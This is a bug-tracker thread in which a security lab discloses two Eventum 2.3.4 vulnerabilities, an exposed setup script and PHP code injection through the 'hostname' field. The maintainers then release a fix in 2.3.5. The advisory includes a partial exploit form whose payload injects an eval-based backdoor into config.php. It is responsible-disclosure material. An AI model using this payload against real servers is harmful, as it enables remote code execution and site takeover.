Eventum Security Vulnerabilities Notification

Bug #1271499 reported by htbridge on 2014-01-22
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Eventum
High
Elan Ruusamäe

Bug Description

Hello,

High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in Eventum 2.3.4.
Preview available here: https://www.htbridge.com/advisory/HTB23198
Developers can contact us by email advisory (at) htbridge.com for details.
For any questions related to this notification message - please visit our General Information & Disclosure Policy page: https://www.htbridge.com/advisory/disclosure_policy.html

Best regards,
High-Tech Bridge Security Research Lab

CVE References

htbridge (advisory) wrote :
Download full text (3.7 KiB)

Hello,

High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.

Detailed description and all available details of the vulnerabilities is provided below in the email.

Please notify us by replying to this email when you release a security update, and provide us if possible with URL of patch/solution so we can add this URL to the advisory.

If you need more time to fix the vulnerabilities - please specify desired Public Disclosure date by replying to this email.

For any questions related to this notification email - please visit our General Information & Disclosure Policy page: https://www.htbridge.com/advisory/disclosure_policy.html

If you don't find an answer to your question there - please feel free to contact us by email: <email address hidden>

===============================================================

Advisory ID: HTB23198
Reference: https://www.htbridge.com/advisory/HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.

1) Incorrect Default Permissions in Eventum

The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.

The installation script can be access by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php

2) Code Injection in Eventum

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.

The following exploitation example injects a backdoor into "/config/config.php" file:

<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="se...

Read more...

Elan Ruusamäe (glen666) wrote :

2.3.5 released

Changed in eventum:
milestone: none → 2.3.5
status: New → Fix Released
assignee: nobody → Elan Ruusamäe (glen666)
importance: Undecided → High
Bryan Alsdorf (balsdorf) wrote :

High tech bridge,

we plan on sending out the release announcement Monday, January 27th sometime before 1200GMT. We will be marking this bug public when we do. That should notify you that you can publish the full details on your website.

Thank you for your discovery and report on this.

htbridge (advisory) wrote :

Hello,

Thank you for your messages.
Advisory was updated:
https://www.htbridge.com/advisory/HTB23198

All the best,
High-Tech Bridge Security Research Lab

Elan Ruusamäe (glen666) on 2014-01-27
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers